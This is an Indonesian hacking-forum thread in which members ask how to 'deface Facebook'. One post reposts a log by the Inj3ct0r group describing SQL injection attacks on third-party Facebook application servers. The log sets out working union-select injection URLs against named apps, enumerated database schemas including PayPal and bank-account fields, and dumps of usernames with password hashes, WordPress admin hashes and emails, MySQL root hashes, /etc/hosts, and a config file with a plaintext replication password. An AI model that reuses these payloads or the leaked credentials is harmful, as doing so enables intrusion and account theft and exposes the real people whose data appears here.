FIRST :pusing: :pusing: :pusing: :pusing: :pusing:
heripujiantoro wrote:
Darkzzzz wrote: Maybe what he meant was defacing a Facebook account, because back then there was an app on Facebook called Html Box.
Source: http://www.readwriteweb.com/archives/to ... tility.php
readwriteweb wrote: HTML Box is an app that lets you add pretty much anything to your Facebook profile. You still can't get around the no autoplay rule that Facebook has imposed on developers, but with HTML Box you could add almost any photo, video, text, or flash animation/application you can think of. In a way, HTML Box lets anyone have their own custom Facebook app running on their profile (i.e., this is perfect for advertising your website or business via your profile!).
Html Box : http://www.facebook.com/apps/applicatio ... 2387972775
Boss, how do you actually use it, boss...
because I'm still a newbie :devil
Deface Facebook
Moderators: Paman, Xshadow, indounderground, NeOS-01
Forum rules
Discussing bugs, penetration, exploitation and techniques for securing websites and web servers. Include a PoC here so members can learn from it.
Re: Deface Facebook
Becoming a person who is useful to my parents is my dream
Visit my NewBie Site http://dippo-unix.co.cc
fb : abay dippo unix
-
- Posts: 10
- Joined: Tue Jun 08, 2010 12:08 pm
Re: Deface Facebook
Please..... would the Masters please explain how to Deface Facebook.
:maaf:
- Darkzzzz
- Posts: 2206
- Joined: Fri Jul 27, 2007 1:59 pm
- Location: UG-HotZone Depok 4, UG-HotZone Klp2 4 & UG-HotZone WaterFall.
- Contact:
Re: Deface Facebook
Don't know whether it still exists or not? Just try going to the LINK, hopefully it still works ...
Hopefully you can herd the prey to some virus-laden HTML
Amen ...
I'm not A Hacker, But I'm A
-
- Posts: 10
- Joined: Tue Jun 08, 2010 12:08 pm
Re: Deface Facebook
I already tried it, boss
Darkzzzz wrote: Don't know whether it still exists or not? Just try going to the LINK, hopefully it still works ...
Hopefully you can herd the prey to some virus-laden HTML
Amen ...
But I don't know the next step
It's like a kind of Facebook app.
So what do you do with it next, boss
- Nol Sembilan Tiga
- Posts: 141
- Joined: Wed Apr 07, 2010 1:19 pm
- Location: MaNad0
- Contact:
Re: Deface Facebook
Ironic, huh? Can Facebook really be hacked? Can it? Yes, of course it can.
Remember, there is no system that is 100% secure.
I guarantee it. Why? Because the people behind the system are what decides it. OK, let's just discuss the matter of Facebook getting hacked. The bug is SQL injection (what the hell?) seriously, I swear,
Facebook's mistake was having a Facebook app on the same host as the Facebook server (unfortunately I don't know which Facebook app). "But that's a Facebook app, not Facebook itself?" Patience, bro, slowly but surely: the app containing the SQL injection bug is the vuln, so once you've broken through the Facebook app you just jump over to Facebook. Awesome, right? With a single click Facebook went straight into "under maintenance". Hats off to bro BI4KKOB4R. :love: :love:
What's even more admirable is that he didn't immediately take Facebook down like the Iranian hackers (CYBERHELL's friends, who get annoyed when someone peeks in) who defaced Twitter the other day. This is proof that Indonesian IT isn't small-time: something the size of Facebook can be peeked into, even getting into the admin. So we have to get our spirit up again.
The analysis above is only a guess put together from various sources, so there could be other techniques. And now, be careful with your Facebook. :devil :devil
-==Just want to learn and learn==-
Re: Deface Facebook
Take a look at this, bro...
but I don't know whether it's real or not, coz I haven't asked the person concerned directly yet...
=================================================================
FaceBook's servers were hacked by the Inj3ct0r team. Hack of the year!
=================================================================
Original: http://inj3ct0r.com/exploits/11638
[+] English translation
Inj3ct0r official website => Inj3ct0r.com
__ __ ___
__ __ /'__`\ /\ \__ /'__`\
/\_\ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __ ___ ___ ___ ___
\/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ /'___\ / __`\ /' __` __`\
\ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ __/\ \__//\ \L\ \/\ \/\ \/\ \
\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ /\_\ \____\ \____/\ \_\ \_\ \_\
\/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/_/\/____/\/___/ \/_/\/_/\/_/
\ \____/
\/___/
[0x00] [Introduction]
[0x01] [First impressions]
[0x02] [Search for bugs]
[0x03] [Inj3ct0r Crash Exploit]
[0x04] [Conclusion]
[0x05] [Greetz]
If you want to know the Inj3ct0r group, read: http://inj3ct0r.com/exploits/9845
__ __ __
/'__`\ /'__`\ /'__`\
/\ \/\ \ __ _/\ \/\ \/\ \/\ \
\ \ \ \ \/\ \/'\ \ \ \ \ \ \ \ \
\ \ \_\ \/> </\ \ \_\ \ \ \_\ \
\ \____//\_/\_\\ \____/\ \____/
\/___/ \//\/_/ \/___/ \/___/
[Introduction]
+ [En] => In this log file you will read a limited version of the information gathered and provided, since the most important
parts are being kept private in order to be analyzed by the proper authorities and to close loopholes in the system.
We did not change the main page, we are not selling the server backup, and we did not delete files.
We have demonstrated the flaw in the system. Start =] ..
__ __ _
/'__`\ /'__`\ /' \
/\ \/\ \ __ _/\ \/\ \/\_, \
\ \ \ \ \/\ \/'\ \ \ \ \/_/\ \
\ \ \_\ \/> </\ \ \_\ \ \ \ \
\ \____//\_/\_\\ \____/ \ \_\
\/___/ \//\/_/ \/___/ \/_/
[First impressions]
At first glance, FaceBook is a well-protected social network.
Scanning the FaceBook server did not give anything interesting ... )
..>
Initiating Parallel DNS resolution of 1 host.
Completed Parallel DNS resolution of 1 host.
Initiating SYN Stealth Scan
Scanning facebook.com (69.63.181.11) [1000 ports]
Discovered open port 443/tcp on 69.63.181.11
Discovered open port 80/tcp on 69.63.181.11
Completed SYN Stealth Scan 13.16s elapsed (1000 total ports)
Initiating Service scan
Scanning 2 services on facebook.com (69.63.181.11)
Service scan Timing: About 50.00% done; ETC:
Completed Service scan at 22:41, 104.15s elapsed (2 services on 1 host)
NSE: Script scanning 69.63.181.11.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 22:41
Completed NSE at 22:41, 0.38s elapsed
NSE: Script Scanning completed.
Nmap scan report for facebook.com (69.63.181.11)
Host is up (0.17s latency).
Hostname facebook.com resolves to 4 IPs. Only scanned 69.63.181.11
rDNS record for 69.63.181.11: www-10-01-snc2.facebook.com
Not shown: 998 filtered ports
PORT    STATE SERVICE   VERSION
80/tcp  open  http
443/tcp open  ssl/https
go ahead .. =]
__ __ ___
/'__`\ /'__`\ /'___`\
/\ \/\ \ __ _/\ \/\ \/\_\ /\ \
\ \ \ \ \/\ \/'\ \ \ \ \/_/// /__
\ \ \_\ \/> </\ \ \_\ \ // /_\ \
\ \____//\_/\_\\ \____//\______/
\/___/ \//\/_/ \/___/ \/_____/
[Search for bugs]
We use GoOgle.com
request: Facebook+Vulnerability [search]
We see a lot of different bugs / exploits / etc ... Mostly only XSS vulnerabilities,
but all of this can be found by searching: http://inj3ct0r.com/search
All the vulnerabilities are closed (nothing works ...). Let us go to GoOgle.com once again
request: site:facebook.com WARNING error
=\ heaven forbid...
Let us not lose heart ) Hackers do not look for easy ways
Visit Facebook.com
Let us search for bugs in the Web Apps.
http://www.facebook.com/robots.txt
oooooooooooooooooooooooooooo
User-agent: *
Disallow: /ac.php
Disallow: /ae.php
Disallow: /album.php
Disallow: /ap.php
Disallow: /feeds/
Disallow: /p.php
Disallow: /photo_comments.php
Disallow: /photo_search.php
Disallow: /photos.php
User-agent: Slurp
Disallow: /ac.php
Disallow: /ae.php
Disallow: /album.php
Disallow: /ap.php
Disallow: /feeds/
Disallow: /p.php
Disallow: /photo.php
Disallow: /photo_comments.php
Disallow: /photo_search.php
Disallow: /photos.php
User-agent: msnbot
Disallow: /ac.php
Disallow: /ae.php
Disallow: /album.php
Disallow: /ap.php
Disallow: /feeds/
Disallow: /p.php
Disallow: /photo.php
Disallow: /photo_comments.php
Disallow: /photo_search.php
Disallow: /photos.php
# E-mail [email protected] and [email protected] if you're authorized to access these, but getting denied.
Sitemap: http://www.facebook.com/sitemap.php
00000000000000000000000000000000
nothing interesting =\
http://apps.facebook.com/tvshowchat/
I looked closely and noticed the links
http://apps.facebook.com/tvshowchat/show.php?id=1 ... habit: check the variable for vulnerabilities...
check:
http://apps.facebook.com/tvshowchat/show.php?id=inj3ct0r
ooooooooooooooooooooooooooo
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 28
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : SystemLiteral " or ' expected in /home/tomkincaid
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 164
and other....
oooooooooooooooooooooooooooo
O_o oops! After sitting on it for a while, I realized that one of the servers is on MySQL.
Writing exploits, I got the following:
http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+@@version--+1
ooooooooooooooooooooooooooo
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: </html> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
5.0.45-log <= ALERT!!!
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
and other....
oooooooooooooooooooooooooooo
Database : adminclt_testsite
Database User : [email protected]
MySQL Version : 5.0.67-log
super =] Now we can say that there is a SQL injection vulnerability:
http://apps.facebook.com/tvshowchat/show.php?id=[SQL Injection Vulnerability]
Now we know that it is MySQL 5.0.45-log
Then let's write another exploit to pull table information from information_schema.tables:
http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+information_schema.tables--+1
oooooooooooooooooooooooooooo
Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: Invalid argument supplied for foreach() in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 38
Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from information_schema.tables-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/
201 <= ALERT!!! 201 tables!
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
and other....
oooooooooooooooooooooooooooo
http://apps.facebook.com/observerfacebook/?p=challenges&id=[SQL INJ3ct0r]
Database : adminclt_testsite
Database User : [email protected]
MySQL Version : 5.0.67-log
1) AdCode
2) AdTrack
3) Admin_DataStore
4) Admin_User
5) Challenges
6) ChallengesCompleted
7) Comments
8) ContactEmails
9) Content
10) ContentImages
11) FeaturedTemplate
12) FeaturedWidgets
13) Feeds
14) FolderLinks
15) Folders
16) ForumTopics
17) Log
18) LogDumps
19) Newswire
20) NotificationMessages
21) Notifications
22) Orders
23) OutboundMessages
24) Photos
25) Prizes
26) RawExtLinks
27) RawSessions
28) SessionLengths
29) Sites
30) Subscriptions
31) SurveyMonkeys
32) SystemStatus
33) Templates
34) User
35) UserBlogs
36) UserCollectives
37) UserInfo
38) UserInvites
39) Videos
40) WeeklyScores
41) Widgets
42) cronJobs
43) fbSessions
Admin_User
1) id
2) name
3) email
4) password
5) userid
6) ncUid
7) level
User
1) userid
2) ncUid
3) name
4) email
5) isAdmin
6) isBlocked
7) votePower
8) remoteStatus
9) isMember
10) isModerator
11) isSponsor
12) isEmailVerified
13) isResearcher
14) acceptRules
15) optInStudy
16) optInEmail
17) optInProfile
18) optInFeed
19) optInSMS
20) dateRegistered
21) eligibility
22) cachedPointTotal
23) cachedPointsEarned
24) cachedPointsEarnedThisWeek
25) cachedPointsEarnedLastWeek
26) cachedStoriesPosted
27) cachedCommentsPosted
28) userLevel
http://apps.facebook.com/ufundraise/fundraise.php?cid=[SQL INJ3CT0R]
Current Database : signalpa_fbmFundRraise
Database User : signalpa_rockaja@localhost
MySQL Version : 5.0.85-community
DATABASE
1) information_schema
2) signalpa_CelebrityPuzzle
3) signalpa_EBF
4) signalpa_appNotification
5) signalpa_appnetwork
6) signalpa_dailyscriptures
7) signalpa_ebayfeed
8) signalpa_fbmFundRraise
9) signalpa_fbmFundRraisebeta
10) signalpa_netcards
11) signalpa_paypal
12) signalpa_thepuzzle
signalpa_fbmFundRraise
1) Campaigns
2) Campaigns_Temp
3) FB_theme
4) IfundDollars
5) Languages
6) Payments
7) Paymentsoops
8) Supporters
9) Users
10) Withdrawals
11) invites
12) invites_copy
13) mp_passwords
14) payment_codes
15) txt_codes
16) valid_servers
17) weeklyBonus
[+] Column: Users
1) id
2) name
3) email
4) mobile_no
5) address
6) country
7) password
8) organisation
9) date_created
10) date_updated
11) status
12) facebook_id
13) isFacebookFan
14) verify
15) paypalUse
16) paypalEmail
17) bacUse
18) bacAcc
19) bacName
20) bacLocation
21) bacCountry
22) bacIBAN
23) bacSort_code
24) current_rank
25) new_rank
26) cronjob
27) max_fundraise
[+] Column: mp_passwords
1) id
2) password
3) username
4) status
5) number
6) rc
7) referer
8) transID
9) currency
10) transType
11) amount
12) confirmed
13) date
signalpa_paypal
1) paypal_cart_info
2) paypal_payment_info
3) paypal_subscription_info
[1] AdrianW: [1] c6553032e2f1bcaf30aa333d0228b783:
[2] Akwala: [2] b0c08027fd0f4deec8515c47125de023:
[3] Aldri: [3] 0366923e9c631e65e30315eff2a14a59:
Column: paypal_cart_info
1) txnid
2) itemname
3) itemnumber
4) os0
5) on0
6) os1
7) on1
8) quantity
9) invoice
10) custom
[+] Column : paypal_payment_info
1) firstname
2) lastname
3) buyer_email
4) street
5) city
6) state
7) zipcode
8) memo
9) itemname
10) itemnumber
11) os0
12) on0
13) os1
14) on1
15) quantity
16) paymentdate
17) paymenttype
18) txnid
19) mc_gross
20) mc_fee
21) paymentstatus
22) pendingreason
23) txntype
24) tax
25) mc_currency
26) reasoncode
27) custom
28) country
29) datecreation
http://apps.facebook.com/tvshowchat/show.php?id=[SQL INJ3CT0R]
Current Database : tv
Database User : [email protected]
MySQL Version : 5.0.45-log
[+] DATABASES
1) information_schema
2) astro
3) candukincaid
4) cemeteries
5) churchwpdb
6) countdownapp
7) crush
8) dare
9) friendiq
10) giants
11) hookup
12) jauntlet
13) loccus
14) luciacanduwp
15) maps
16) martisor
17) mediax
18) mostlikely
19) music
20) pimpfriends
21) plans
22) politicsapp
23) postergifts
24) posters2
25) projectbasecamp
26) pwnfriends
27) quiz
28) seeall
29) send
30) supporter
31) swapu
32) tomsapps
33) travelbug
[+] tab.send
1) app
2) item
3) itemforuser
4) neverblue
5) user
[+] Columns
user(12454)
1) userid
2) siteid
3) appkey
4) session
5) points
6) added
7) removed
Tab. candukincaid
1) wp_comments
2) wp_links
3) wp_options
4) wp_post****
5) wp_posts
6) wp_px_albumPhotos
7) wp_px_albums
8) wp_px_galleries
9) wp_px_photos
10) wp_px_plugins
11) wp_term_relationships
12) wp_term_taxonomy
13) wp_terms
14) wp_user****
15) wp_users
[+]Column wp_users
1) ID
2) user_login
3) user_pass
4) user_nicename
5) user_email
6) user_url
7) user_registered
8) user_activation_key
9) user_status
10) display_name
etc...
http://apps.facebook.com/fluff/fluffbook.php?id=[SQL Inj3ct0r]
> ~ inj3ct0r_facebook_exploit [ENTER]
root:*368C08021F7260A991A9D8121B7D7808C99BBB8A
slave_user:*38E277D5CA4EAA7E9A73F8EF80813D7B5859E407
muu:*74A45B921A1A918B18AE9B137396E5A67E006262
monitor:*1840AE2C95804EC69321D1EE33AADFA249817034
maatkit:*9FA5157314A2CF7448A34DA070B5D44E977A1220
http://apps.facebook.com/snowago/area.php?areaid=[SQL Inj3ct0r]
Database: affinispac_fb
User: affinispac_fb@localhost
Version: 5.0.67-community
http://www.chinesezodiachoroscope.com/facebook/index1.php?user_id=[SQL Inj3ct0r]
>plucky@localhost : facebook : 4.0.13-log
etc... =]
Next xD
Database: thetvdb
User: thetvdb@localhost
Version: 5.0.51a-24-log
[Database]: thetvdb
[Table]
[1]aka_seriesname
[2]apiusers
[3]banners
[4]deletions
[5]genres
[6]imgstatus
[7]languages
[8]mirrors
[9]networks
[10]ratings
[11]runtimes
[12]seriesactors
[13]seriesupdates
[14]translation_episodename
[15]translation_episodeoverview
[16]translation_labels
[17]translation_seriesname
[18]translation_seriesoverview
[19]tvepisodes
[20]tvseasons
[21]tvseries
[22]user_episodes
[23]users
users:
id,username,userpass,emailaddress,ipaddress,userlevel,languageid,favorites,
favorites_displaymode,bannerlimit,banneragreement,active,uniqueid,
lastupdatedby_admin,mirrorupdate
[userpass]
[1] *E92C1AB432D14ACA4D6618A9DFC22810363B114E:
[2] *C62726955C4492A6A0CB7319C3928DACEAC4C66D:
[3] *887C5DA43E5ACEE73689956A4497C0EDA956E790:
[4] *57D6D9BF9F1962C9A006BB451FAF21693624391E:
[5] *51121B1DC695FF11A3AEF514AAA0C487611FD98B:
[6] 3d801aa532c1cec3ee82d87a99fdf63f
[Database]: wiki
[Table]
[24]archive
[25]categorylinks
[26]externallinks
[27]filearchive
[28]hitcounter
[29]image
[30]imagelinks
[31]interwiki
[32]ipblocks
[33]job
[34]langlinks
[35]logging
[36]math
[37]objectcache
[38]oldimage
[39]page
[40]page_restrictions
[41]pagelinks
[42]querycache
[43]querycache_info
[44]querycachetwo
[45]recentchanges
[46]redirect
[47]revision
[48]searchindex
[49]site_stats
[50]templatelinks
[51]text
[52]trackbacks
[53]transcache
[54]user
[55]user_groups
[56]user_newtalk
[57]watchlist
user:
user_id,user_name,user_real_name,user_password,user_newpassword,user_newpass_time,
user_email,user_options,user_touched,user_token,user_email_authenticated,user_email_token,
user_email_token_expires,user_registration,user_editcount
['user_name'] : ['user_pass']
[1] AdrianW: [1] c6553032e2f1bcaf30aa333d0228b783:
[2] Akwala: [2] b0c08027fd0f4deec8515c47125de023:
[3] Aldri: [3] 0366923e9c631e65e30315eff2a14a59:
[4] AleX: [4] afbb46ebf8c46bfb1f286df87d577f87:
[5] Arucard: [5] e94f2b46cbfc681d2346424d7e0e3b3f:
[6] AxesDenyd: [6] a998f782d92a8af1c683e6a0e36404e4:
[7] Badubo: [7] 5a8920177dbf9abddefe4ff49ebbc67c:
[8] Bjarkimg: [8] fd6a9eef25ead144df9592087bb4aec5:
[9] BrandonB1218: [9] 62cda59cc492df4f1b1dd4d1365b5ff5:
[10] Bsudbury: [10] 827d07956629c37855f3518374821872:
[11] Burchard: [11] 4dc05fcbbf5850d27e627d5c4278c4cf:
[12] Carla: [12] f41991b4dfd3b494c39751225e1faa29:
[13] Click170: [13] 9c38b5f4673372a806f38a4dade456cc:
[14] Coco: [14] f6770367b7ca8261a25ea797c24761aa:
[15] Corte: [15] 9add39f338de37ce1cf52eaed38b09b2:
[16] Crippler: [16] b3d947a82648b2707130f176204cbbfd:
[17] Dbkungfu: [17] 0bcb65441f47097f85af79c793c74b95:
[18] Deuce911: [18] 0220c76e24b82236675500f1e536a4be:
[19] DigitallyBorn: [19] 3e57b721280c35ba66f2a151e19c620b:
[20] Divervan10: [20] 1ad65386e69de0896f49c7d0fbaa0cba:
[21] Donovan: [21] 03e4e11728c5f16fc936cb4c1d803029:
[22] Drkshenronx: [22] ea0b8397ad79d255195780e367ccf026:
[23] Emigrating12: [23] c45db536613d53252d00be3dc81cbde0:
[24] Emphatic: [24] 3195961b90ea2fe0ac6d12efac8fef19:
[25] Eta: [25] f083e5e3fd924342f77e4111df8788e1:
[26] Farrism: [26] efef4efa85d73ca0247052687ca9683b:
[27] Fiven: [27] 5f6dd4fde7d37c19d1e267618f55d35f:
[28] FloVi: [28] 918f77c2a0fe807b3cff8816b8aed8ee:
[29] Fritigern: [29] 6a16028b432de68363a20912c31bca03:
[30] Furby: [30] 117088a3b9b504ce23c7926c8691fced:
[31] Gerph: [31] 294d0c1541c7d892962cb51d540753c1:
[32] Hallvar: [32] 4a5da5086b99a7d2f8aef976d364d07c:
[33] Happyfrog: [33] 189a598dbdf27734a47c4731c099712d:
[34] Hjeffrey: [34] 9b6daf5130c8c1a329a1e6ceff31d448:
[35] Hsvjez: [35] fef14c536557ec3b0727246e6f57fadb:
[36] Jase81: [36] 9e4c45874be6735b6432e5f060660a46:
[37] Jcnetdev: [37] 88a2dc251c777d48189501a79e3d3ffa:
[38] Jcpmcdonald: [38] 083968e4c21e6f3ff47c3fefad7c3ff7:
[39] Jobba: [39] 699cb250cc53224bf0220d4c8f513a27:
[40] Jschek: [40] 9bcf4c5f58764dc4c812b78276d5e412:
[41] Juliani1024: [41] c5ea2a208e8e24bd0e3696be6de3bd07:
[42] Kakosi: [42] b747252b62d95163a083acf54141bfc6:
[43] KelleyCook: [43] b929c4422b9ea29845d1bf46fde7e765:
[44] Ken brueck: [44] 1fd5e065ac6587cf351dee24f79def76:
[45] Kennykixx: [45] 2a4a9abc742f3508fa37f37e30ed480b:
[46] Kermtfrg: [46] cbaef6f6fa9175d419af3395f25bd814:
[47] Keydon: [47] e9e984ed67c7e8a67f3406c5506293ec:
[48] Kraigspear: [48] ac70640d36b6c9a3fcff3f66687fd3d5:
[49] Krisg1984: [49] c78ea770e941c369aa3463c9a74d2f1d:
[50] Leecole: [50] 4b3b865528e582b6a4dfc9430aec1ea8:
[51] Livemac: [51] 0e36e0b0866b8911216c464fe8440319:
[52] Markscore: [52] 5710cbdd3de7e28c7c93eb8e48e266a9:
[53] Mcmanuss8: [53] 6262c8e4c7a5bb9d49743c5659d3cc40:
[54] Mcoit: [54] 980a1ea1d9fd960208d004fe7ce928fb:
[55] Mhale62: [55] df318f477b0c4a3e4f9f3e1ced62f607:
[56] Mjh ca: [56] 07223e31ea0a8a617934081475d9ad52:
[57] Mreuring: [57] 42472c97f021f725cea7670b078795a1:
[58] Nathanlburns: [58] b7e16c89320be1b9860dcb83a082881a:
[59] Nekocha: [59] 490c01eea35370bca2c78dce7ab633da:
[60] Ngoring: [60] a19430b436a03fdfda8818f8cf486580:
[61] Nighthawk92: [61] e8c8cf0eeaec4841c14ede3bcac7e6bb:
[62] Null dev: [62] 4e744d982a173d0e1439787da27f022c:
[63] Nunovi: [63] 7325e3df990caadddf2423cf96272fed:
[64] Obsidianpanther: [64] 53fd2e06ca60a0640cdc617681ace453:
[65] PLUCKYHD: [65] 2ac1aa8f8e5341788c9ca7555cc10714:
[66] Plambert: [66] 9333604b2eefdcc01debb843373ae492:
[67] Polargeek: [67] d0394680e24f75e7dae4e0ca23756161:
[68] QyleCoop: [68] af49b70536b2ec2439095947bab36b43:
[69] Ramsay: [69] 317192baea92e857e27c96e80c9f6874:
[70] Scrooge666: [70] 8498d4d9c8de0300f0b8b3bc789d6731:
[71] SeaLawyer: [71] 14dd3e79c6f486319e39ef694cd61a2d:
[72] Searlea: [72] 058beaa0d231d457136015119da5aa34:
[73] Serberus: [73] ff80d6419f6be5d76dd404fdb256eb3c:
[74] Skillzzz: [74] 5f012a10f4eeddacfd2c495f64dbd975:
[75] Smakkie: [75] 7143a09106678ec593eec82fcf3e66fd:
[76] Smoko: [76] d9a1360bfcdedb3c6f48a37442d58dd8:
[77] Smuto: [77] 20ec74ff3d72d42f7593002b0d28a540:
[78] Stdly: [78] 4d7b92f616ffe6b420180e859bf245ba:
[79] Swiip: [79] 120cc4e935a2c57763709392c5eb6fdf:
[80] Szsori: [80] e7fb98c3d405dcc89314996b9c5c6cb2:
[81] THe-BiNk: [81] 49e6e431cccf6a77bf6dafa0c96a361a:
[82] TheStapler: [82] 7278b0168b8cfb38e64d2b6abe6991fc:
[83] Todu: [83] 2173ff53b1fb2bbe3fd49d3d17b6f09f:
[84] TommyD: [84] ca62c603dffc337b87a662fa904caa51:
[85] TrocdRonel: [85] 318698c02f2f6ea7fef38e17cdaa1ac5:
[86] Trol1234: [86] ce07cb60f64f2119a657a1427edc359e:
[87] Trolik123456: [87] d392ceb168469aca3b21e1aaeb00f301:
[88] Trolik23512: [88] dd16749110a800511459fa4ed655b36c:
[89] Trololo23512: [89] 3d508eed899c625389167d2216fae370:
[90] Weaverslodge: [90] c2c22a2c65b487915911c1d7f66b85e8:
[91] Woodstock123: [91] ba4d45f8c7e9574dd839993a2001d5cd:
[92] Wwarby: [92] 04409a510d208e737fa00cd97c712740:
[93] Yabba: [93] 4b1febeed49cd185a8efbb8a61f68d74:
[94] Zombiigraet33456904: [94] 028785be8488292e8b88137b5fd2c128:
[95] Zombiigraet33456906: [95] 4820e4653d77bb3ccab9e7ed25155a5b:
[96] Zubbizub1212: [96] ea2e5c44c48ce8f880a0f1627e599868:
---------------------------------------------------------------------------------------------------------------------------------------------------
read /etc/hosts
127.0.0.1 localhost localhost.localdomain
192.168.1.167 140696-db2.flufffriends.com 140696-db2
192.168.1.166 140695-db1.flufffriends.com 140695-db1
192.168.1.165 140694-web2.flufffriends.com 140694-web2
192.168.1.164 140693-web1.flufffriends.com 140693-web1
69.63.176.141 api.facebook.com
208.116.17.80 peanutlabs.com
----------------------------------
/etc/my.cnf
#SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1
log-bin=/var/lib/mysqllogs/bin-log
binlog-do-db=fluff2
expire-logs-days=14
server-id = 5
#master-host=69.63.176.141
#master-user=romis_user
#master-password=romis0123
#master-connect-retry=60
replicate-do-db=miserman
#log-slave-updates
expire_logs_days = 14
I think we found a sufficient number of vulnerabilities!
---------------------------
__ __ __
/'__`\ /'__`\ /'__`\
/\ \/\ \ __ _/\ \/\ \/\_\L\ \
\ \ \ \ \/\ \/'\ \ \ \ \/_/_\_<_
\ \ \_\ \/> </\ \ \_\ \/\ \L\ \
\ \____//\_/\_\\ \____/\ \____/
\/___/ \//\/_/ \/___/ \/___/
[Inj3ct0r Crash Exploit]
So .. moving on to the fun part, friends
To avoid vandalism by script kiddies I will not give you a link to shell.php, but I enclose some images and a few interesting queries =]
..> Inj3ct0rExploit start . + . + . + . + . + . + .
wp_posts
post_password
wp_users
user_pass
done.....
WordPress! oO One of the modules installed on facebook is WordPress!
check link: http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+candukincaid.wp_users--+1
oooooooooooooooooooooooooooo
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from candukincaid.wp_users-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 67
3 <= ALERT! Users! =]
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 124
oooooooooooooooooooooooooooo
..> Inj3ct0r_Crach_exploit [ENTER]
user:
admin:$P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/
lucia:$P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/
tom:$P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR.
cracker:
admin : $P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/ :admin:[email protected]
lucia : $P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/ :lucia:[email protected]
tom : $P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR. :tom:[email protected]
see request:
http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws(0x3a,user_login,user_pass)+from+candukincaid.wp_users+limit+1--
http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+1,1--
http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+2,1--
